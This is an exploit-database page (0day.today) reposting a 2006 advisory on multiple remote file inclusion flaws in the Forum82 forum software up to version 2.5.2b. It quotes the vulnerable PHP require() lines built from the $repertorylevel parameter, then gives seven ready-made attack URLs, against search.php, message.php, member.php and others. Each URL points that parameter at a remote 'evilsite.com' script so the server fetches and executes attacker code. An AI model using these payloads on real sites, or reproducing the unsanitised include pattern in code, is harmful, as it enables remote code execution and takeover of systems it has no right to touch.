[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Forum82 <= 2.5.2b (repertorylevel) Multiple File Include Vulnerabilities

Author
Silahsiz Kuvvetler
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-910
Category
web applications
Date add
28-09-2006
Platform
unsorted
========================================================================
Forum82 <= 2.5.2b (repertorylevel) Multiple File Include Vulnerabilities
========================================================================



#==============================================================================================
#Forum82 <= v2.5.2b (repertorylevel) Multiple R.F.I. Vulnerabilities
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                                                                                                    
#                                                                       
#Version : v2.5.2b 
#                                                         
#================================================================================================
#
#Bug in : 
#
#almost all files are infected...
#================================================================================================
#
#Vulnerable Code :
#
#		summary & example:
#
#	require($repertorylevel.'include/tables.inc.'.$e);
#       require($repertorylevel.'lang/lang.inc.'.$e);
#       require($repertorylevel.'include/db/mysql.inc.'.$e);
#         
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/search.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/message.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/member.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/mail.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/lostpassword.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/gesfil.php?repertorylevel=http://evilsite.com/evilscript.txt?
#
#http://sitename.com/[Forum82_Installed_DIR]/forum/forum82lib.php3?repertorylevel=http://evilsite.com/evilscript.txt?
#
#bla...bla...
#
#
#
#
#	the script files's are installed as .php3 to website.take care that...
#
#================================================================================================
#Discoverd By : Silahsiz Kuvvetler 
#
#GreetZ : FaTTaLGazI - NarcoTic - 0xyGen
#
#==================================================================================================




#  0day.today [2024-12-24]  #